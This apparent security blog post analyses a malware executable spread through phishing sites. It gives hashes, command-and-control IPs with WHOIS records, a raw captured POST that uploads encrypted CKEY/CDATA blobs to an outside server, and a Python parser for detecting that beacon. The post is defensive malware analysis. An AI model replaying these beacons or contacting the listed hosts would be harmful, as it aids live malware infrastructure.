More generic malware

I discovered this junk while browsing around phishing sites: www.serenitydrive.com

SHA256: 76e8fb0cc8c1953730bce96f5761c3fca9cf44e54cd9fa93dae361d9f9d239eb
File name: Label_GB_Manchester.exe
Virustotal Report
Malwr Report

When run, it spawns another process of itself in a hijacked svchost and then contacts 62.112.157.126 on TCP port 8080.
The IP resolves to “server.edv-p.net”.
POST /index.php HTTP/1.1
inetnum: 62.112.157.124 – 62.112.157.127
netname: HOSTT-65-NET
descr: Hosttech
descr: Haslaub
descr: 8824 Schoenenberg
country: CH

It seemed to download another file from there.
SHA256: 27f340a21502a24d4745c693bfa411238c563300ea3d23dc4f6ae96cc974ad0e
Virustotal Report
Malwr Report

This file seems to be focused on DDoS against a few music video sites (as far as I could work out from the names).

It also downloaded an SMTP spambot:
SHA256: 18fbf7039433d3e464a4fd55e8536fefc22f99e52478a8f96b631f63707327c8
Virustotal Report
Malwr Report

I also saw it upload and download CDATA.BIN and CKEY.BIN files from 72.51.46.206 (“homebase.ksoftware.net”) on port 8080:

POST /cb/board.pl HTTP/1.1
Host: 72.51.46.206:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 471

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CKEY"

.......O7`H....,h*x....E.1........A.s.9.Y..A......b..........t.j>...1.P.......{2f{W.@.(~Aq.&..K..C...x.s.q..&..}...E..ymSwY.s.s/
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CDATA"

.m2.../...jkx.7..!..O.#.....!z..pX.7.4..$v.....b....h.\....V..!XeN....B.%..DJ..v<(=.....T766 .....gd...(@J3../..i.*a.i$..J.e.5.8&UH..|....1....`..{.........q?)..|.y....{..9k
--1BEF0A57BE110FD467A--

HTTP/1.1 200 OK
Server: nginx/1.5.6
Date: Sat, 25 Oct 2014 21:29:41 GMT
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
Content-Length: 520
Connection: close

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CDATA"; filename="CDATA.BIN"
Content-Type: application/octet-stream

.m2.../.......7..e..]'.R..fC.z.j..=7.....R>S......Z9..~Q{.>...H.........a..#."....ts.)-...6.K.."F....n.
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CKEY"; filename="CKEY.BIN"
Content-Type: application/octet-stream

I.GqM.w.K.....1...4.R..D..5b...[.{.[|.......Y.]
.
..!....E.o(..[`/.....R"5.79.b...n.3.....-..........+mR...F..|BC... ..._H....g.
--1BEF0A57BE110FD467A--

The IP is owned by ServerBeach:
Net Range 72.51.32.0 – 72.51.47.255
CIDR 72.51.32.0/20
Name PEER1-SERVERBEACH-06A
Handle NET-72-51-32-0-1
Parent PEER1-BLK-08 (NET-72-51-0-0-1)
Net Type Reallocated
Origin AS AS13768
Organization ServerBeach (SERVE-32)

I also saw it communicate similar CKEY and CDATA posts to 74.52.192.186 (“ba.c0.344a.static.theplanet.com”) on port 8080 using the same URL as above.
Net Range 74.52.0.0 – 74.55.255.255
CIDR 74.52.0.0/14
Name NETBLK-THEPLANET-BLK-14
Handle NET-74-52-0-0-1
Parent NET74 (NET-74-0-0-0-0)
Organization ThePlanet.com Internet Services, Inc. (TPCM)
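The CKEY/CDATA beacon shape seen against both of these servers is easy to match from a captured request once the multipart body is split into its parts. The following is an added example, not code from the original post: it parses a constructed request modelled on the capture above (the two opaque binary blobs are replaced with placeholder bytes) and flags the combination of a POST to /cb/board.pl on port 8080 carrying both a CKEY and a CDATA part. The function and constant names are my own.

```python
import re

# Constructed sample modelled on the capture in the post; the two opaque
# binary blobs are replaced with short placeholder bytes.
SAMPLE_REQUEST = (
    b"POST /cb/board.pl HTTP/1.1\r\n"
    b"Host: 72.51.46.206:8080\r\n"
    b"Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\n"
    b"\r\n"
    b"--1BEF0A57BE110FD467A\r\n"
    b'Content-Disposition: form-data; name="CKEY"\r\n'
    b"\r\n"
    b"\x00\x01KEYBYTES\r\n"
    b"--1BEF0A57BE110FD467A\r\n"
    b'Content-Disposition: form-data; name="CDATA"\r\n'
    b"\r\n"
    b"\x00\x02DATABYTES\r\n"
    b"--1BEF0A57BE110FD467A--\r\n"
)

def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP request into method, path, headers and multipart parts."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path = lines[0].decode("ascii").split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        key, _, value = line.decode("latin-1").partition(":")
        headers[key.strip().lower()] = value.strip()
    parts = {}
    m = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if m:  # walk the body delimiter by delimiter, stopping at the closing "--"
        for chunk in body.split(b"--" + m.group(1).encode("ascii"))[1:]:
            if chunk.startswith(b"--"):
                break
            phead, _, pbody = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
            name = re.search(rb'name="([^"]+)"', phead)
            if name:
                parts[name.group(1).decode("ascii")] = pbody.rstrip(b"\r\n")
    return {"method": method, "path": path, "headers": headers, "parts": parts}

def is_cb_board_beacon(req: dict) -> bool:
    """Flag the shape seen in the post: a POST to /cb/board.pl on port 8080 whose
    multipart body carries both a CKEY and a CDATA part."""
    return (req["method"] == "POST"
            and req["path"] == "/cb/board.pl"
            and req["headers"].get("host", "").endswith(":8080")
            and {"CKEY", "CDATA"} <= set(req["parts"]))
```

The same parser applies to the server's multipart response, whose parts carry filename="CDATA.BIN" and filename="CKEY.BIN" in addition to the part names.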

For both of those last two servers there is a slight misconfiguration. If you visit the folder without a / on the end, the webserver on port 8080 tries to redirect you to a full URL, which it attempts to build as the same IP but with port 4440. This might link it to some other malware campaign, but Google isn’t returning anything interesting at this point.

Malwr also saw traffic to this host.
Malwr also saw initial infection traffic to 70.32.75.58 (“www.tokyo22.com”) on port 8080, getting the file /index.php.
Net Range 70.32.64.0 – 70.32.127.255
CIDR 70.32.64.0/18
Name MEDIATEMPLE-106
Handle NET-70-32-64-0-1
Parent NET70 (NET-70-0-0-0-0)
Net Type Direct Allocation
Origin AS
Organization Media Temple, Inc. (MEDIAT-10)
